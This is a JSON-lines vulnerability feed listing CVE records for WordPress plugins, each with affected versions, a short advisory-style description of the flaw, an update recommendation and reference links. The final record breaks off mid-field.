{"CVE_ID":"CVE-2019-25212","slug":"wp-responsive-video-gallery-with-lightbox","versionImpact":"1.0.6","versionEndExcluding":"1.0.7","description":"The video carousel slider with lightbox plugin for WordPress is vulnerable to SQL Injection via the 'id' parameter in all versions up to, and including, 1.0.6 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 1.0.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/85e70be3-3ed7-4ce1-a20c-046fb7c4ec31?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/85e70be3-3ed7-4ce1-a20c-046fb7c4ec31?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-responsive-video-gallery-with-lightbox\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-responsive-video-gallery-with-lightbox\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=\\\/wp-responsive-video-gallery-with-lightbox\\\/tags\\\/1.0.6&new_path=\\\/wp-responsive-video-gallery-with-lightbox\\\/tags\\\/1.0.7&sfp_email=&sfph_mail=#file41\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=\\\/wp-responsive-video-gallery-with-lightbox\\\/tags\\\/1.0.6&new_path=\\\/wp-responsive-video-gallery-with-lightbox\\\/tags\\\/1.0.7&sfp_email=&sfph_mail=#file41\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11763","slug":"plezi","versionImpact":"1.0.6","versionEndExcluding":"1.0.7","description":"The Plezi plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'plezi' shortcode in all versions up to, and including, 1.0.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.0.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/plezi\\\/trunk\\\/includes\\\/plz-admin.php#L590\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/plezi\\\/trunk\\\/includes\\\/plz-admin.php#L590\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/67768957-45be-48d9-ad5e-147290ef4cd5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/67768957-45be-48d9-ad5e-147290ef4cd5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11754","slug":"booking-system-trafft","versionImpact":"1.0.6","versionEndExcluding":"1.0.7","description":"The Booking System Trafft plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'trafftbooking' shortcode in all versions up to, and including, 1.0.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.0.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3207016%40booking-system-trafft&new=3207016%40booking-system-trafft&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3207016%40booking-system-trafft&new=3207016%40booking-system-trafft&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/84adbde0-9a9b-4a76-9333-56880fcc139d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/84adbde0-9a9b-4a76-9333-56880fcc139d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1514","slug":"profit-products-tables-for-woocommerce","versionImpact":"1.0.6.7","versionEndExcluding":"1.0.6.8","description":"The Active Products Tables for WooCommerce. Use constructor to create tables plugin for WordPress is vulnerable to unauthorized filter calling due to insufficient restrictions on the get_smth() function in all versions up to, and including, 1.0.6.7. This makes it possible for unauthenticated attackers to call arbitrary WordPress filters with a single parameter.","recommendation":"Update to version 1.0.6.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profit-products-tables-for-woocommerce\\\/trunk\\\/index.php#L1753\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profit-products-tables-for-woocommerce\\\/trunk\\\/index.php#L1753\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3257043%40profit-products-tables-for-woocommerce&new=3257043%40profit-products-tables-for-woocommerce&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3257043%40profit-products-tables-for-woocommerce&new=3257043%40profit-products-tables-for-woocommerce&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6edf91de-9553-4aa1-a29f-89771c8e852e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6edf91de-9553-4aa1-a29f-89771c8e852e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0864","slug":"profit-products-tables-for-woocommerce","versionImpact":"1.0.6.6","versionEndExcluding":"1.0.6.7","description":"The Active Products Tables for WooCommerce. Use constructor to create tables plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'shortcodes_set' parameter in all versions up to, and including, 1.0.6.6 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.0.6.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profit-products-tables-for-woocommerce\\\/trunk\\\/index.php#L1624\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profit-products-tables-for-woocommerce\\\/trunk\\\/index.php#L1624\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profit-products-tables-for-woocommerce\\\/trunk\\\/index.php#L88\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profit-products-tables-for-woocommerce\\\/trunk\\\/index.php#L88\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3235888%40profit-products-tables-for-woocommerce&new=3235888%40profit-products-tables-for-woocommerce&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3235888%40profit-products-tables-for-woocommerce&new=3235888%40profit-products-tables-for-woocommerce&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f93dcb51-1caf-4d63-a8f3-f6251dd0d19f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f93dcb51-1caf-4d63-a8f3-f6251dd0d19f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0797","slug":"profit-products-tables-for-woocommerce","versionImpact":"1.0.6.1","versionEndExcluding":"1.0.6.2","description":"The Active Products Tables for WooCommerce. Professional products tables for WooCommerce store plugin for WordPress is vulnerable to unauthorized access of functionality due to a missing capability check on several functions in all versions up to, and including, 1.0.6.1. This makes it possible for subscribers and higher to execute functions intended for admin use.","recommendation":"Update to version 1.0.6.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0a94841f-b1dd-44f4-b7a1-65a9fdf7b18d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0a94841f-b1dd-44f4-b7a1-65a9fdf7b18d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3029488\\\/profit-products-tables-for-woocommerce\\\/trunk?contextall=1&old=3005088&old_path=%2Fprofit-products-tables-for-woocommerce%2Ftrunk\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3029488\\\/profit-products-tables-for-woocommerce\\\/trunk?contextall=1&old=3005088&old_path=%2Fprofit-products-tables-for-woocommerce%2Ftrunk\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0796","slug":"profit-products-tables-for-woocommerce","versionImpact":"1.0.6.1","versionEndExcluding":"1.0.6.2","description":"The Active Products Tables for WooCommerce. Professional products tables for WooCommerce store plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.6.1. This is due to missing or incorrect nonce validation on several functions corresponding to AJAX actions. This makes it possible for unauthenticated attackers to invoke those functions via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 1.0.6.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5069fbc4-b3c4-4c0b-892c-2c83f35dc2fe?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5069fbc4-b3c4-4c0b-892c-2c83f35dc2fe?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3029488\\\/profit-products-tables-for-woocommerce\\\/trunk?contextall=1&old=3005088&old_path=%2Fprofit-products-tables-for-woocommerce%2Ftrunk\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3029488\\\/profit-products-tables-for-woocommerce\\\/trunk?contextall=1&old=3005088&old_path=%2Fprofit-products-tables-for-woocommerce%2Ftrunk\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13601","slug":"majestic-support","versionImpact":"1.0.5","versionEndExcluding":"1.0.6","description":"The Majestic Support \u2013 The Leading-Edge Help Desk & Customer Support Plugin plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 1.0.5 via the 'exportusereraserequest' function due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Subscriber-level access and above, to export ticket data for any user.","recommendation":"Update to version 1.0.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/majestic-support\\\/tags\\\/1.0.5\\\/modules\\\/gdpr\\\/controller.php#L110\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/majestic-support\\\/tags\\\/1.0.5\\\/modules\\\/gdpr\\\/controller.php#L110\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3231938\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3231938\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ebf5537d-d80e-4844-8ed4-480f4a533439?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ebf5537d-d80e-4844-8ed4-480f4a533439?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13600","slug":"majestic-support","versionImpact":"1.0.5","versionEndExcluding":"1.0.6","description":"The Majestic Support \u2013 The Leading-Edge Help Desk & Customer Support Plugin plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.0.5 via the 'majesticsupportdata' directory. This makes it possible for unauthenticated attackers to extract sensitive data stored insecurely in the \/wp-content\/uploads\/majesticsupportdata directory which can contain file attachments included in support tickets.","recommendation":"Update to version 1.0.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/majestic-support\\\/tags\\\/1.0.5\\\/includes\\\/classes\\\/uploads.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/majestic-support\\\/tags\\\/1.0.5\\\/includes\\\/classes\\\/uploads.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3231938\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3231938\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c5a8fd90-49dd-4a5e-88f2-cd6b338da2d6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c5a8fd90-49dd-4a5e-88f2-cd6b338da2d6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10789","slug":"wp-user-profile-avatar","versionImpact":"1.0.5","versionEndExcluding":"1.0.6","description":"The WP User Profile Avatar plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.5. This is due to missing or incorrect nonce validation on the wpupa_user_admin() function. This makes it possible for unauthenticated attackers to update the plugins setting which controls access to the functionality via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 1.0.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3222923\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3222923\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b056cc98-3bd8-493a-bbf4-9bcee2e52d24?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b056cc98-3bd8-493a-bbf4-9bcee2e52d24?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1089","slug":"coupon-zen","versionEndExcluding":"1.0.6","description":"The Coupon Zen WordPress plugin before 1.0.6 does not have CSRF check when activating plugins, which could allow attackers to make logged in admins activate arbitrary plugins present on the blog via a CSRF attack","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9787e26f-33fe-4c65-abb3-7f5c76ae8d6f\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9787e26f-33fe-4c65-abb3-7f5c76ae8d6f\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9575","slug":"pretix-widget","versionImpact":"1.0.5","versionEndExcluding":"1.0.6","description":"Local File Inclusion vulnerability in pretix Widget WordPress plugin pretix-widget on Windows allows PHP Local File Inclusion. This issue affects pretix Widget WordPress plugin: from 1.0.0 through 1.0.5.","recommendation":"Update to version 1.0.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/pretix.eu\\\/about\\\/en\\\/blog\\\/20241009-wordpress-plugin-1-0-6\\\/\",\"name\":\"https:\\\/\\\/pretix.eu\\\/about\\\/en\\\/blog\\\/20241009-wordpress-plugin-1-0-6\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0453","slug":"wp-private-message","versionEndExcluding":"1.0.6","description":"The WP Private Message WordPress plugin (bundled with the Superio theme as a required plugin) before 1.0.6 does not ensure that private messages to be accessed belong to the user making the requests. This allowing any authenticated users to access private messages belonging to other users by tampering the ID.","refs":"[{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/superio-job-board-wordpress-theme\\\/32180231\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/superio-job-board-wordpress-theme\\\/32180231\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f915e5ac-e216-4d1c-aec1-c3be11e2a6de\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f915e5ac-e216-4d1c-aec1-c3be11e2a6de\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13672","slug":"mini-course-generator","versionImpact":"1.0.5","versionEndExcluding":"1.0.6","description":"The Mini Course Generator | Embed mini-courses and interactive content plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'mcg' shortcode in all versions up to, and including, 1.0.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.0.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mini-course-generator\\\/tags\\\/1.0.4\\\/includes\\\/class-mcg-shortcodes.php#L10\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mini-course-generator\\\/tags\\\/1.0.4\\\/includes\\\/class-mcg-shortcodes.php#L10\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3243023%40mini-course-generator&new=3243023%40mini-course-generator&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3243023%40mini-course-generator&new=3243023%40mini-course-generator&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b47505a5-fb7f-4e41-a6de-6f0b330aa495?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b47505a5-fb7f-4e41-a6de-6f0b330aa495?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6244","slug":"pz-frontend-manager","versionImpact":"1.0.5","versionEndExcluding":"1.0.6","description":"The PZ Frontend Manager WordPress plugin before 1.0.6 does not have CSRF checks in some places, which could allow attackers to make logged in users perform unwanted actions via CSRF attacks","recommendation":"Update to version 1.0.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/73ba55a5-6cff-40fc-9686-30c50f060732\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/73ba55a5-6cff-40fc-9686-30c50f060732\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1614","slug":"wp-custom-author-url","versionEndExcluding":"1.0.5","description":"The WP Custom Author URL WordPress plugin before 1.0.5 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/56abd1e2-0ea9-47f7-9a1b-2093ac15d39c\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/56abd1e2-0ea9-47f7-9a1b-2093ac15d39c\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13714","slug":"all-images-ai","versionImpact":"1.0.4","versionEndExcluding":"1.0.5","description":"The All-Images.ai \u2013 IA Image Bank and Custom Image creation plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the '_get_image_by_url' function in all versions up to, and including, 1.0.4. This makes it possible for authenticated attackers, with Subscriber-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 1.0.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3231889%40all-images-ai&new=3231889%40all-images-ai&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3231889%40all-images-ai&new=3231889%40all-images-ai&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/422c634c-5119-40ef-adf7-681c3d8c09a2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/422c634c-5119-40ef-adf7-681c3d8c09a2?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2019-25222","slug":"wp-responsive-thumbnail-slider","versionImpact":"1.0.4","versionEndExcluding":"1.0.5","description":"The Thumbnail carousel slider plugin for WordPress is vulnerable to SQL Injection via the 'id' parameter in all versions up to, and including, 1.0.4 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 1.0.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-responsive-thumbnail-slider\\\/tags\\\/1.0.4\\\/wp-responsive-images-thumbnail-slider.php#L1326\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-responsive-thumbnail-slider\\\/tags\\\/1.0.4\\\/wp-responsive-images-thumbnail-slider.php#L1326\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-responsive-thumbnail-slider\\\/tags\\\/1.0.5\\\/wp-responsive-images-thumbnail-slider.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-responsive-thumbnail-slider\\\/tags\\\/1.0.5\\\/wp-responsive-images-thumbnail-slider.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-responsive-thumbnail-slider\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-responsive-thumbnail-slider\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f6023483-3fa5-4b85-9422-7d395abcfbd8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f6023483-3fa5-4b85-9422-7d395abcfbd8?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-24563","slug":"cleanup-light","versionImpact":"1.0.4","versionEndExcluding":"1.0.5","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ThemeGlow Cleanup \u2013 Directory Listing & Classifieds WordPress Plugin allows Reflected XSS. This issue affects Cleanup \u2013 Directory Listing & Classifieds WordPress Plugin: from n\/a through 1.0.4.","recommendation":"Update to version 1.0.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/cleanup-light\\\/vulnerability\\\/wordpress-cleanup-directory-listing-classifieds-plugin-1-0-4-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/cleanup-light\\\/vulnerability\\\/wordpress-cleanup-directory-listing-classifieds-plugin-1-0-4-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4455","slug":"smart-product-review","versionImpact":"1.0.4","versionEndExcluding":"1.0.5","description":"The Wordpress Plugin Smart Product Review plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in all versions up to, and including, 1.0.4. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 1.0.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.exploit-db.com\\\/exploits\\\/50533\",\"name\":\"https:\\\/\\\/www.exploit-db.com\\\/exploits\\\/50533\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1de9183c-95b9-4500-85e2-08dcee956360?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1de9183c-95b9-4500-85e2-08dcee956360?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10690","slug":"shortcode-elementor","versionImpact":"1.0.4","versionEndExcluding":"1.0.5","description":"The Shortcodes for Elementor plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.0.4 via the 'SHORTCODE_ELEMENTOR' shortcode due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from private and draft posts created with Elementor that they should not have access to.","recommendation":"Update to version 1.0.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3207001%40shortcode-elementor&new=3207001%40shortcode-elementor&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3207001%40shortcode-elementor&new=3207001%40shortcode-elementor&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5debe121-6373-4b56-8441-f0d4a5920089?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5debe121-6373-4b56-8441-f0d4a5920089?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6058","slug":"wpbookit","versionImpact":"1.0.4","versionEndExcluding":"1.0.5","description":"The WPBookit plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the image_upload_handle() function hooked via the 'add_booking_type' route in all versions up to, and including, 1.0.4. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 1.0.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpbookit\\\/trunk\\\/core\\\/admin\\\/classes\\\/controllers\\\/class.wpb-booking-type-controller.php#L455\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpbookit\\\/trunk\\\/core\\\/admin\\\/classes\\\/controllers\\\/class.wpb-booking-type-controller.php#L455\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3314288%40wpbookit&new=3314288%40wpbookit&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3314288%40wpbookit&new=3314288%40wpbookit&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1d779ad1-fdbe-444c-85c5-99146a1a03d8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1d779ad1-fdbe-444c-85c5-99146a1a03d8?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11369","slug":"store-credit-for-woocommerce","versionImpact":"1.0.49.46","versionEndExcluding":"1.0.49.47","description":"The Store credit \/ Gift cards for woocommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'coupon', 'start_date', and 'end_date' parameters in all versions up to, and including, 1.0.49.46 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.0.49.47, or a newer patched 